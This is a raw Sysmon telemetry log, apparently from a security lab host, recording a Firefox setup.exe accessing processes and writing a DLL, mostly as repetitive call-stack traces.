13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll2021-01-18 13:59:52.099 10341000x800000000000000014142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.d